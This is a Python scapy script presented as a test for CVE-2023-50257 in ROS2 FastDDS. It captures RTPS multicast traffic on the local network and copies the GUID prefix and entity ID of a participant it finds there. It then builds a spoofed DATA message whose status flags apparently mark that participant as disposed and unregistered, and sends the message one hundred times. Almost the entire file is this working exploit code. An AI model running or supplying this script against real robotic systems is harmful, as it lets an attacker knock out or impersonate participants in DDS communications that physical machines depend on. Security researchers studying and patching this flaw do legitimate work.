#!/usr/bin/env python3
import os, sys, time, binascii, struct
from scapy.all import sniff, sendp, Ether, IP, UDP, Raw, get_if_list
from scapy.contrib.rtps import *

# ================================
# Global Settings
# ================================
CAPTURE_DURATION    = 5              # passed as sniff(timeout=...) in start_capture()
ATTACK_PACKET_COUNT = 100            # passed as sendp(count=...) in send_attack()
PACKET_INTERVAL     = 0.1            # passed as sendp(inter=...) in send_attack()
MULTICAST_IP        = "239.255.0.1"  # capture filter host and destination address of the crafted packet
MULTICAST_PORT      = 7400           # capture filter port and UDP destination port of the crafted packet
# ================================


def print_banner():
    """Print the coloured test title followed by the affected-version table.

    The output ends with one empty line.
    """
    banner_lines = (
        "\033[95m=== CVE-2023-50257 TEST ===\033[0m",
        "Affected ROS2/DDS Version (FastDDS / RMW-FastDDS):",
        "  FOXY     : 2.1.4 ↓ / 1.3.2 ↓",
        "  GALACTIC : 2.3.6 ↓ / 5.0.2 ↓",
        "  HUMBLE   : 2.6.6 ↓ / 6.2.3 ↓",
        "  IRON     : 2.10.2 ↓ / 7.1.1 ↓",
        "",  # trailing blank line
    )
    for text in banner_lines:
        print(text)

def check_root():
    """Exit with status 1 unless the effective user ID is 0.

    When the check fails, a red error line is printed to stdout before
    exiting.
    """
    running_as_root = os.geteuid() == 0
    if running_as_root:
        return

    print("\033[91m[Error] Root privileges required.\033[0m")
    sys.exit(1)

def start_capture():
    """Sniff the configured multicast traffic and return the first RTPS packet.

    Captures on every interface reported by ``get_if_list()`` for
    ``CAPTURE_DURATION`` (the sniff timeout), with a BPF filter restricted to
    ``MULTICAST_IP`` and ``MULTICAST_PORT``. The whole capture is stored and
    scanned only after sniffing has finished.

    Returns:
        A ``(packet, interface)`` tuple: the first captured packet that has
        UDP and Raw layers and whose raw payload starts with ``b"RTPS"``,
        together with that packet's ``sniffed_on`` attribute.

    Exits the process with status 1 if no such packet was captured.
    """
    print(f"\033[94m[*] Starting Packet Capture: {MULTICAST_IP}:{MULTICAST_PORT}\033[0m")
    pkts = sniff(
        filter=f"host {MULTICAST_IP} and port {MULTICAST_PORT}",
        # get_if_list() already returns the interface names; no copy needed.
        iface=get_if_list(),
        timeout=CAPTURE_DURATION,
        store=True,
    )
    for pkt in pkts:
        # The RTPS header starts with the 4-byte ASCII magic "RTPS".
        if UDP in pkt and Raw in pkt and bytes(pkt[Raw].load).startswith(b"RTPS"):
            return pkt, pkt.sniffed_on

    print("\033[91m[Error] No RTPS packet found on the network.\033[0m")
    sys.exit(1)

def extract_info(pkt):
    """Extract the UDP source port, GUID prefix and entity ID from *pkt*.

    Args:
        pkt: A packet with ``UDP`` and ``Raw`` layers whose raw payload is
            an RTPS message.

    Returns:
        A dict with three keys:
            ``'src_port'``    - the UDP source port of *pkt*;
            ``'guid_prefix'`` - payload bytes 8..19 (12 bytes);
            ``'entity_id'``   - payload bytes 44..47 (4 bytes).

    Raises:
        ValueError: If the raw payload is shorter than 48 bytes, so the
            fixed offsets above cannot all be read.
    """
    guid_prefix_span = slice(8, 20)
    # NOTE(review): offset 44 presumably lands on the writer entity ID when
    # the 20-byte header is followed by a 12-byte INFO_TS submessage and then
    # a DATA submessage - confirm against the captured traffic.
    entity_id_span = slice(44, 48)

    data = bytes(pkt[Raw].load)
    if len(data) < entity_id_span.stop:
        # Fail here with a clear message instead of returning truncated
        # slices that only blow up later when they are unpacked.
        raise ValueError(
            f"RTPS payload too short: got {len(data)} bytes, "
            f"need at least {entity_id_span.stop}"
        )

    return {
        'src_port': pkt[UDP].sport,
        'guid_prefix': data[guid_prefix_span],
        'entity_id': data[entity_id_span],
    }

def define_rtps_classes(hostId, appId, instanceId, entityId):
    """Define the scapy packet classes used to build the crafted RTPS message.

    The classes are created inside this function so that the four arguments
    can be baked in as default field values.

    Args:
        hostId: Default for the ``hostId`` fields (32-bit integer).
        appId: Default for the ``appId`` fields (32-bit integer).
        instanceId: Default for the ``instanceId`` fields (32-bit integer).
        entityId: Default for the ``entity`` field of ``participantId``
            (32-bit integer).

    Returns:
        A ``(RTPS, RTPSSubMessage_DATA)`` tuple of packet classes: the
        message header and the submessage body that follows it.
    """
    # Last entry of the inline-QoS list built below (parameter id 0x0001).
    class PacketSENTINEL(PIDPacketBase):
        name = "PID_SENTINEL"
        fields_desc = [ EField(XIntField("parameter_id", 0x0001), endianness=FORMAT_LE) ]

    # 16-byte identifier: the three prefix words plus the supplied entity ID.
    class participantId(EPacket):
        name = "participantId"
        fields_desc = [
            XIntField("hostId", hostId),
            XIntField("appId", appId),
            XIntField("instanceId", instanceId),
            XIntField("entity", entityId),
        ]

    # Same prefix words, but with a fixed entity value instead of entityId.
    # NOTE(review): 0x000001c1 looks like the RTPS well-known participant
    # entity ID - confirm against the specification.
    class participantId2(EPacket):
        name = "participantId"
        fields_desc = [
            XIntField("hostId", hostId),
            XIntField("appId", appId),
            XIntField("instanceId", instanceId),
            XIntField("entity", 0x00001c1),
        ]

    # Inline-QoS parameter 0x0083; its declared length 0x0018 (24) matches
    # the 16-byte participantId plus the two 4-byte fields that follow.
    class UnknownPacket(EPacket):
        name = "Unknown"
        fields_desc = [
            EField(ShortField("parameter_id", 0x0083), endianness=FORMAT_LE),
            EField(ShortField("parameter_length", 0x0018), endianness=FORMAT_LE),
            PacketListField("participantId", [participantId()], participantId),
            XIntField("parameter1",0), XIntField("parameter2",0x01000000),
        ]

    # Inline-QoS parameter 0x0070; its declared length 0x0010 (16) matches
    # the four 4-byte fields of participantId2.
    # NOTE(review): 0x0070 is presumably PID_KEY_HASH - confirm.
    class KeyHashPacket(EPacket):
        name = "Data Packet"
        fields_desc = [
            EField(ShortField("parameter_id", 0x0070), endianness=FORMAT_LE),
            EField(ShortField("parameter_length", 0x0010), endianness=FORMAT_LE),
            PacketListField("participantId", [participantId2()], participantId2),
        ]

    # Inline-QoS parameter 0x0071 carrying one 4-byte flags word.
    # NOTE(review): 0x0071 is presumably PID_STATUS_INFO and flags value 3
    # presumably sets both the "disposed" and "unregistered" bits - confirm.
    class StatusPacket(EPacket):
        name = "status info"
        fields_desc = [
            EField(ShortField("parameter_id", 0x0071), endianness=FORMAT_LE),
            EField(ShortField("parameter_length", 0x0004), endianness=FORMAT_LE),
            XIntField("flags", 3),
        ]

    # The complete inline-QoS list: three parameters followed by the sentinel.
    class InlineQoSPacket(EPacket):
        name = "Inline QoS"
        fields_desc = [
            PacketField("UnknownPacket", UnknownPacket(), UnknownPacket),
            PacketField("KeyHashPacket", KeyHashPacket(), KeyHashPacket),
            PacketField("StatusPacket", StatusPacket(), StatusPacket),
            PacketField("sentinel", PacketSENTINEL(), PacketSENTINEL),
        ]

    # 20-byte message header: magic (0x52545053 is ASCII "RTPS"), version
    # 2.3, vendor id, then the three prefix words supplied by the caller.
    # NOTE(review): this local class presumably shadows an ``RTPS`` name
    # pulled in by the star import at the top of the file - confirm.
    class RTPS(Packet):
        name = "RTPS Header"
        fields_desc = [
            XIntField("magic", 0x52545053), XByteField("major", 2),
            XByteField("minor", 3), XShortField("vendor_id",0x010f),
            XIntField("hostId",hostId), XIntField("appId",appId),
            XIntField("instanceId",instanceId),
        ]

    # Two back-to-back submessages in one class: id 0x09 with an 8-byte
    # timestamp, then id 0x15 carrying the inline-QoS list.
    # NOTE(review): 0x09 / 0x15 are presumably INFO_TS / DATA, and the
    # reader/writer entity IDs 0x000100c7 / 0x000100c2 presumably the
    # built-in SPDP participant reader/writer - confirm against the spec.
    # NOTE(review): the length and sequence-number defaults (0x0800, 0x5000,
    # 0x1000, 0x02000000) look like byte-swapped little-endian values
    # (8, 80, 16, 2); that only produces the intended bytes if these fields
    # are serialized big-endian - confirm what e_flags resolves to here.
    class RTPSSubMessage_DATA(EPacket):
        name = "RTPS DATA"
        fields_desc = [
            XByteField("submessageId1",0x09), XByteField("flags1",1),
            ShortField("octetsToNextHeader1",0x0800),
            XLongField("Timestamp",0x59000168c759aba0),
            XByteField("submessageId2",0x15), XByteField("flags2",3),
            ShortField("octetsToNextHeader2",0x5000),
            XNBytesField("extraFlags",0,2),
            EField(ShortField("octetsToInlineQoS",0x1000), endianness_from=e_flags),
            X3BytesField("readerEntityIdKey",0x000100),
            XByteField("readerEntityIdKind",0xc7),
            X3BytesField("writerEntityIdKey",0x000100),
            XByteField("writerEntityIdKind",0xc2),
            EField(IntField("writerSeqNumHi",0), endianness_from=e_flags),
            EField(IntField("writerSeqNumLow",0x02000000), endianness_from=e_flags),
            PacketField("inline_qos", InlineQoSPacket(), InlineQoSPacket),
        ]
    return RTPS, RTPSSubMessage_DATA

def send_attack(info, iface):
    """Build one crafted RTPS packet from *info* and send it repeatedly.

    Args:
        info: Dict with ``'guid_prefix'`` (12 bytes), ``'entity_id'``
            (4 bytes) and ``'src_port'`` (UDP source port to reuse).
        iface: Name of the interface the packets are sent on.

    Raises:
        struct.error: If ``'guid_prefix'`` is not exactly 12 bytes or
            ``'entity_id'`` is not exactly 4 bytes.

    The packet is sent ``ATTACK_PACKET_COUNT`` times with
    ``PACKET_INTERVAL`` between transmissions.
    """
    # Split the 12-byte prefix into three big-endian 32-bit words, which is
    # the form the packet classes take as field defaults.
    hostId, appId, instanceId = struct.unpack("!III", info['guid_prefix'])
    (entityId,) = struct.unpack("!I", info['entity_id'])
    RTPS, RTPSSubMessage_DATA = define_rtps_classes(hostId, appId, instanceId, entityId)

    # NOTE(review): the IP source address is hard-coded here; it is not
    # taken from the captured packet.
    pkt = (
        Ether() /
        IP(src="172.23.184.22", dst=MULTICAST_IP) /
        UDP(sport=info['src_port'], dport=MULTICAST_PORT) /
        RTPS() /
        RTPSSubMessage_DATA()
    )
    print("\033[93m[!] Send Attack RTPS packet...\033[0m")
    sendp(pkt, iface=iface, count=ATTACK_PACKET_COUNT, inter=PACKET_INTERVAL)
    print(f"\033[92m[+] Sent {ATTACK_PACKET_COUNT} packets.\033[0m")

if __name__ == "__main__":
    # Show the banner first, then refuse to continue without root.
    print_banner()
    check_root()

    # Capture one RTPS packet and remember which interface it arrived on.
    captured_pkt, capture_iface = start_capture()
    target_info = extract_info(captured_pkt)
    print(f"[*] Found RTPS on interface: {capture_iface}")

    # Send the crafted packets out of the interface the capture came from.
    send_attack(target_info, capture_iface)

